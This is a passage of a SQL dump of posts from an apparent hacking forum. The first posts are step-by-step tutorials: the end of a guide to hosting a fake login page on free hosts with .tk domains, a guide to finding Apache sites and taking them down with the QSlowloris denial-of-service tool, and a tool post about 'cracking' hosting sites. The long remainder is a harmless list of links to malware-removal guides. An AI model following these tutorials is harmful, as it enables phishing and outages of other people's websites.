name*.com/login.php[/url] You do the same for any forum! Thank you for reading! Hope it helps! If i was missing something, or you have any questions, PM me! ALTERNATIVES: Also, if you don\'t want to use spam.com, use ripway.com and after you uploaded everything, go to http://www.dot.tk and choose a free .tk domain name. Credits: Rockey Killer', '72.229.164.105', '1223009385', '0', '0', '8', '1346971095', '1', '0fa4a624e9db2542f8429b011d842036', '0', '1346971095'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1652', '352', '0', '12', 'How to Take Down Websites Effectively + Proof', '0', '8', 'spacefish36', '1346971302', '[align=center] [size=x-large][color=#006400].:::How to Effectively Down the Websites:::. [/color][/size] [img]http://www.resourcesystemsconsulting.com/blog/wp-content/uploads/Shutdown.png[/img] [size=medium][color=#FF0000][b]What is DoS attack?[/b][/color][/size] [b][size=xx-small][color=#FFD700]Short for denial-of-service attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols. For all known DoS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks. But, like viruses, new DoS attacks are constantly being dreamed up by hackers.[/color][/size][/b] [/align] [align=justify] [b][size=medium][color=#FF0000]Finding a Vulnerable Website[/color][/size][/b] [b]Most websites using Apache servers,so find any website and go to [color=#FF0000]http://uptime.netcraft.com/[/color] now you need check website.[/b] [b]As you can see that this website is Using Apache , which is a Great news , So now , we will try to attack it ,[/b] [img]http://i.imgur.com/0qEpH.png[/img] [size=large][b][color=#800000]Ready to DoS Attack[/color][/b][/size] Now you need to Download QSlowloris [url=http://adf.ly/2bBZR]Here[/url] [url=http://www.virustotal.com/file-scan/report.html?id=1d8939bfdbbeb9d6a39d91a2a06c29eb790b6d7b5e96310790d94d7e2c9430e8-1309466345][color=#FF0000][b]Scan Report[/b][/color][/url] [b]Now Open Program , and Setup this Tool like this: [img]http://i.imgur.com/7G6v4.png[/img] Now Click on Fire , and Your Target goes Down, like in this Screenshot , before it is working , but Afterward this is Down, If u have any Doubt on the Tool, that some think like of \"It is coded , with some this type of feature that when we put Website , and click fire, it will disable from our Computer Just\" But in Real , You can check that it gonna down from all Computer of the World As Given in Screen Shot , You can check online that, if this website Down or Not. [color=#FF0000]http://downforeveryoneorjustme.com[/color] [img]http://i.imgur.com/UIKW5.png[/img] [/align][/b] NOTE: If your Website Didnot Get Down , then note that this website Apeche if Powerful. [b][color=#8B4513]Thanks 4 Watching this Tutorial.[/color][/b] [color=#006400][b]Credits:- asad3man[/b][/color]', '72.229.164.105', '1223009385', '0', '0', '1', '1347079276', '1', 'd3f3a9bc1aeb13f3bb4da7937406afb5', '0', '1347079276'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1692', '352', '1689', '12', 'RE: Linear Mode How to Take Down Websites Effectively + Proof', '0', '1', 't3h jok3r', '1347079330', '[quote=\'NXK\' pid=\'1689\' dateline=\'1347078187\'] [quote=\'p420\' pid=\'1687\' dateline=\'1347076992\'] [quote=\'NXK\' pid=\'1660\' dateline=\'1346972166\'] Seems legit. Please add a virus scan for your DoS tool. [/quote] Dude there\'s no need for a virus scan because the download link is seized by the Feds. [/quote] Than may I ask why there is a download link? [/quote] :roflol: The OP is Spacefish, not P420.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '7a308bf8139c236566b7c5937f41c2a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1653', '156', '449', '13', 'RE: [tut]View/Download SQL DB', '0', '13', 'unixmoon', '1346971441', 'Damn this shit works. This shit mad crazy..', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '29206ee315da022febcd51c49613d638', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1654', '353', '0', '13', '[Complete Guide]*How to crack All Sites Hosting With Apex!*[Complete Guide]', '0', '13', 'unixmoon', '1346971496', '[color=#32CD32][size=large][align=center][b]*How to crack All Sites Hosting With Apex!*[/b][/align][/size][/color] [align=center] [color=#87CEFA][b]Today I will teach you to use this wonderful program (APEX) which you can crack it all and more! [/b][/color] [/align] [align=center][img]http://nextube.org/forum/images/imported/2011/01/369.png[/img][/align] [align=center][img]http://nextube.org/forum/images/imported/2011/01/370.png[/img][/align] [align=center][img]http://nextube.org/forum/images/imported/2011/01/371.png[/img][/align] [align=center][img]http://nextube.org/forum/images/imported/2011/01/372.png[/img][/align] [align=center][img]http://nextube.org/forum/images/imported/2011/01/373.png[/img][/align] [align=center][img]http://nextube.org/forum/images/imported/2011/01/374.png[/img][/align] [align=center][img]http://nextube.org/forum/images/imported/2011/01/588.png[/img][/align] [align=center][img]http://nextube.org/forum/images/imported/2011/01/375.png[/img][/align] [align=center][img]http://nextube.org/forum/images/imported/2011/01/376.png[/img][/align] [align=center][img]http://nextube.org/forum/images/imported/2011/01/377.png[/img][/align] [color=#87CEFA][align=center][b]Here some References for you :[/b][/align][/color] [align=center][b]Have Fun Cracking! :glad:[/b][/align] Credit to Heppona', '72.229.164.105', '1223009385', '0', '0', '13', '1346971541', '1', 'aded7ea790bdd3b24355c46f28b9d8a5', '0', '1346971541'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1655', '344', '1623', '3', 'RE: Quick Updates and Notices V.2', '0', '13', 'unixmoon', '1346971591', 'Nice updates, thanks Jok3r for the updates and your hard work.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '454b05fc00e1e291c0dd417b2f4bfad3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1656', '354', '0', '23', '[MBAM] Self-Help Removal Tutorials', '0', '13', 'unixmoon', '1346971723', 'While scouring the internet in search of ideas of content to populate our White Hat Section I stumbled across an old abandoned thread on HF. At one point in time it had served as a link directory to articles on how to remove specific Malware as written by MBAM Forum Staff. So after a lot of updating and revising, here\'s the resurrected thread, the way it was meant to have been posted. I would like to say thank you to \"Miah\" on HF for giving me this idea. I\'ll try to update this periodically. [i]Last Revision 08/28/12[/i] [color=#00BFFF][b]List:[/b][/color] [list] [*][color=#00BFFF][b]2012 Self Help Guides[/b][/color][list] [*][url=http://forums.malwarebytes.org/index.php?showtopic=114520]Removal instructions for Kotech-Protect[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=114491]Removal instructions for WindowsBoanPatch[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=114424]Removal instructions for Windows Safety Series[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=114218]Removal instructions for Super Boan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=114087]Removal instructions for Windows Anti-Malware Patch[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=114040]Removal instructions for BitClean[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=113830]Removal instructions for Windows Interactive Safety[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=113699]Removal instructions for VitaVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=113669]Removal instructions for Windows Antivirus Machine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=113459]Removal instructions for MasterBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=113262]Removal instructions for CoreSecure[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=113238]Removal instructions for Windows Active Guard[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=113106]Removal instructions for VaccineForce[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=112896]Removal instructions for Windows Security Renewal[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=112641]Removal instructions for BestSpeed[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=112594]Removal instructions for Windows Premium Defender[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=112323]Removal instructions for Trojan.Ransom.AI[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=112195]Removal instructions for VClear[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=112178]Removal instructions for Windows Expert Series[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=112161]How to deal with DNS Hijackers[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=111901]Removal instructions for FastCure[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=111880]Removal instructions for Windows Interactive Security[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=111737]Removal instructions for BoanCode[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=111722]Removal instructions for AnyBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=111712]Removal instructions for Windows Custom Management[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=111528]Removal instructions for SolutionPC[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=111395]Removal instructions for Windows Maintenance Guard[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=111378]Removal instructions for PcCare[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=111256]Removal instructions for Windows Secure Web Patch[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=111228]Removal instructions for PrivacyTop[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=111089]Removal instructions for Best Antivirus Software[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=110941]Removal instructions for Windows Custom Safety[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=110908]Removal instructions for PowerBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=110761]Removal instructions for Windows PC Aid[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=110630]Removal instructions for Live Security Platinum[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=110565]Removal instructions for Defence Privacy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=110494]Removal instructions for Windows Antivirus Rampart[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=110374]Removal instructions for ProtectPC[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=110341]Removal instructions for Windows Guard Tools[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=110212]Removal instructions for Check119[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=110073]Removal instructions for RealBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=109986]Removal instructions for Windows Secure Surfer[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=109934]Removal instructions for Cen Protect[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=109828]Removal instructions for Total Anti Malware Protection[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=109783]Removal instructions for Windows Abnormality Checker[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=109662]Removal instructions for InterBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=109589]Removal instructions for Windows Advanced User Patch[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=109515]Removal instructions for SpeedPlus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=109382]Removal instructions for Windows Safety Module[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=109293]Removal instructions for Windows Safety Checkpoint[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=109256]Removal instructions for MyDefender[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=109119]Removal instructions for Windows Efficiency Accelerator[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=108957]Removal instructions for RealSpeed[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=108936]Removal instructions for Windows Antivirus Care[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=108800]Removal instructions for Windows Guard Solutions[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=108641]Removal instructions for PrivacyCut[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=108628]Removal instructions for Windows Foolproof Protector[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=108495]Removal instructions for TotalBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=108303]Removal instructions for Windows Efficiency Reservoir[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=108272]Removal instructions for Advanced Antispyware Solution[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=108126]Removal instructions for Windows Warding System[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=108014]Removal instructions for SMART HDD[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=107968]Removal instructions for Windows Trouble Taker[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=107849]Removal instructions for PrivacyG[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=107734]Removal instructions for Windows AntiHazard Helper[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=107641]Removal instructions for Security Shield 2012[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=107596]Removal instructions for Windows Guardian Angel[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=107384]Removal instructions for Smart Fortress 2012[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=107349]Removal instructions for Windows Risk Minimizer[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=107298]Removal instructions for Best Virus Protection[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=107169]Removal instructions for Windows Tools Patch[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=107136]Removal instructions for Cool-PC[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=107041]Removal instructions for Antimalware PC Safety[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=106931]Removal instructions for InternetBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=106906]Removal instructions for Antivirus Protection[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=106765]Removal instructions for Windows Smart Partner[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=106642]Removal instructions for Home Malware Cleaner[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=106608]Removal instructions for Windows Functionality Checker[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=106299]Removal instructions for Security Scanner[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=106015]Removal instructions for Internet Security[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=106066]Removal instructions for EveryClear[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=105900]Removal instructions for InfoSeven[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=105766]Removal instructions for Smart Protection 2012[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=105718]Removal instructions for PCMaster Antispyware[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=105598]Removal instructions for PCspeed[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=105420]Removal instructions for Antivirus Smart Protection[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=105357]Removal instructions for Com-doumi[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=105187]Removal instructions for Malware Protection Center[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=105047]Removal instructions for PCupgrade[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=105030]Removal instructions for BoanCatch[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=104798]Removal instructions for CYAK[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=104627]Removal instructions for Internet Security Guard[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=104589]Removal instructions for PC Spider[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=104373]Removal instructions for MicroVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=104156]Removal instructions for CleanerCom[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=104073]Removal instructions for ProtectOn[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=103770]Removal instructions for MyInfoBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=103514]Removal instructions for BootCare[/url] [/list][/list] [list] [*][color=#00BFFF][b]2011 Self Help Guides[/b][/color][list] [*][url=http://forums.malwarebytes.org/index.php?showtopic=103433]Removal instructions for Super AV[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=103157]Removal instructions for Home Security Solutions[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=102963]Removal instructions for Security Monitor 2012[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=102898]Removal instructions for InfoManager[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=102656]Removal instructions for Win 7 Antivirus 2012 (and its clones)[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=102371]Removal instructions for Antivirii 2011[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=102310]Removal instructions for HomeBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=100844]Removal instructions for XP Security 2012 (and its clones)[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=101997]Removal instructions for Protect Cop[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=101660]Removal instructions for PowerPc[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=101644]Removal instructions for DoctorCom[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=101406]Removal instructions for VirusSecurity[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=101167]Removal instructions for SweeperLab[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=101107]Removal instructions for DataSave[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=100615]Removal instructions for CleanCatch[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=100570]Removal instructions for Cloud AV 2012[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=100404]Removal instructions for PrivacyUp[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=100142]Removal instructions for CoreScan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=100097]Removal instructions for AV Protection 2011[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=99970]Removal instructions for WindowPC[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=99731]Removal instructions for AnyCop[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=99664]Removal instructions for AV Security 2012[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=99446]Removal instructions for Protect Keep[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=99247]Removal instructions for Privacy Protection[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=99218]Removal instructions for Anti Avoid[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=99002]Removal instructions for ProtectCode[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=98819]Removal instructions for VirusKorea[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=98813]Removal instructions for PatchUp_Plus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=98542]Removal instructions for System Security 2011[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=98281]Removal instructions for FastScan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=98199]Removal instructions for BoanKorea[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=98048]Removal instructions for AV Protection Online[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=97880]Removal instructions for PC Speed Up[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=97788]Removal instructions for VirusScan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=97530]Removal instructions for Cloud Protection[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=97313]Removal instructions for Guard Online[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=97240]Removal instructions for RealCleaner[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=97136]Removal instructions for AV Guard Online[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=96774]Removal instructions for PCPlus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=96691]Removal instructions for Security Sphere (2012)[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=96440]Removal instructions for VaccineCom[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=96173]Removal instructions for MicroPop[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=96103]Removal instructions for Privacy.I[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=95943]Removal instructions for dr.Boan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=95741]Removal instructions for Windows Live Protect[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=95552]Removal instructions for InfoBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=95497]Removal instructions for HelpPrivacy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=95291]Removal instructions for VIHunter[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=95101]Removal instructions for Cleancert[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=95063]Removal instructions for OpenCloud Security[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=94808]Removal instructions for BoanCop[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=94576]Removal instructions for Windows Easy Warden[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=94490]Removal instructions for Antivirus 2011 Edition limitée[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=94176]Removal instructions for OpenCloud Antivirus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=93912]Removal instructions for Windows Salvor Tool[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=93822]Removal instructions for MainPrivacy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=93494]Removal instructions for BoanClear[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=93192]Removal instructions for Home Safety Essentials[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=93114]Removal instructions for SafePrivacy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=92797]Removal instructions for PrivacyBoho[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=92498]Removal instructions for Wolfram Antivirus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=92228]Removal instructions for ErrorDoctor[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=91879]Removal instructions for Defensevirus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=91811]Removal instructions for InfoGuard[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=91704]Removal instructions for PrivacyCode[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=91228]Removal instructions for CodeScan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=91152]Removal instructions for DualVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=90878]Removal instructions for MacroVirus On-call[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=90568]Removal instructions for BlueFlare Antivirus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=90452]Removal instructions for Zentom System Guard[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=90127]Removal instructions for BoanKing[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=89877]Removal instructions for Security Protection[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=89824]Removal instructions for Security Solution 2011[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=89285]Removal instructions for PCMedic[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=89210]Removal instructions for Windows Test Master[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=88906]Removal instructions for Windows Easy Supervisor[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=88708]Removal instructions for Windows Proofness Guarantor[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=88636]Removal instructions for Personal Shield Pro[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=88418]Removal instructions for ClearPC[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=88158]Removal instructions for Windows Antivirus System[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=88099]Removal instructions for Security Shield (2)[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=87313]Removal instructions for Windows Accelerating Utility[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=87114]Removal instructions for MicroPC[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=86955]Removal instructions for Windows Examination Utility[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=86861]Removal instructions for Milestone Antivirus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=86561]Removal instructions for BasicPrivacy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=86362]Removal instructions for Windows Salvage System[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=86279]Removal instructions for PrivacyAlpha[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=86104]Removal instructions for Windows Accidents Prevention[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=85810]Removal instructions for Windows Necessary Firewall[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=85754]Removal instructions for VaccineU[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=85535]Removal instructions for Windows Profile System[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=85286]Removal instructions for Windows Protection Servant[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=85033]Removal instructions for Essential Cleaner[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=84832]Removal instructions for Windows Activity Inspector[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=84736]Removal instructions for InfoKeeper[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=84637]Removal instructions for Windows Work Catalyst[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=84475]Removal instructions for Windows Stability Center[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=84119]Removal instructions for Windows Oversight Center[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=84108]Removal instructions for PrivacyKey[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=83773]Removal instructions for SelfPrivacy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=83523]Removal instructions for PrivacyView[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=83107]Removal instructions for Security Shield[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=82888]Removal instructions for Antivirus Protection Trial[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=82876]Removal instructions for PC-Safe[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=82696]Removal instructions for XP Total Security 2011 (and its clones)[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=82613]Removal instructions for Antivirus Clean 2011[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=82084]Removal instructions for VaccineCore[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=82028]Removal instructions for WindowsFixDisk[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=81677]Removal instructions for Boan119[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=81281]Removal instructions for WindowsRestore[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=81102]Removal instructions for MS Removal Tool[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=80941]Removal instructions for BoanSupport[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=80557]Removal instructions for HomeClean[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=80422]Removal instructions for Windows Passport Utility[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=79675]Removal instructions for AdStop[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=79287]Removal instructions for Windows Recovery[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=79079]Removal instructions for Windows Lowlevel Solution[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=78835]Removal instructions for VaccineScan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=78453]Removal instructions for Windows Emergency System [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=78386]Removal instructions for Windows Efficiency Magnifier[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=78054]Removal instructions for AntiGuard[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=77717]Removal instructions for Windows Troubles Remover[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=77635]Removal instructions for ProPrivacy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=77433]Removal instructions for AntiVirus AntiSpyware 2011[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=77035]Removal instructions for Windows DebugSystem[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=76949]Removal instructions for ZeroVaccine [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=76745]Removal 